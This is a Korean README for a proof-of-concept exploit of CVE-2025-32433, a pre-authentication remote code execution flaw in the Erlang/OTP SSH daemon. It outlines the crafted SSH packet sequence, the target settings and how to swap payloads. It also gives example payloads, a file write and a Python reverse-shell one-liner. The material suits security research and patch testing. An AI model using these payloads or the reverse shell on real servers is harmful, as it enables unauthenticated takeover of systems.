
CVE-2025-32433에 대한 개념 증명(PoC) 익스플로잇으로, Erlang/OTP SSH 데몬의 인증 전 RCE입니다. 조작된 SSH 채널 요청을 전송하고 임의의 명령을 실행하는 Python 스크립트를 포함합니다.
CVE-2025-32433은 Erlang/OTP SSH 데몬에 영향을 미치는 원격 코드 실행(RCE) 취약점입니다.
근본 원인은 공격자가 사전 인증(pre-authentication) SSH 채널 요청을 조작하여
인증 전에 임의 명령 실행을 유발할 수 있도록 하는 부적절한 처리입니다.
포함된 PoC는 이러한 조작된 SSH 패킷을 전송하는 방법을 시연하며, 기본적으로 대상에 /lab.txt 파일을 생성하지만 다른 명령으로 변경할 수 있습니다.
HOST = "127.0.0.1" # Target IP
PORT = 2222 # Target SSH port
python3 cve-2025-32433.py
기본적으로 pwned가 포함된 /lab.txt 파일을 생성합니다.
build_channel_request의 페이로드를 수정하여 자신만의 명령을 실행할 수 있습니다.
# Write a file file:write_file("/lab.txt", <<"pwned">>).Spawn a reverse shell
os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")
SSH_MSG_KEXINIT를 전송합니다.exec 페이로드가 포함된 SSH_MSG_CHANNEL_OPEN 및 SSH_MSG_CHANNEL_REQUEST를 전송합니다.Matt Keeley(Platform Security)가 발견 및 분석을 작성했습니다. PoC를 공개하고 세부 정보를 공유해 준 그에게 감사드립니다.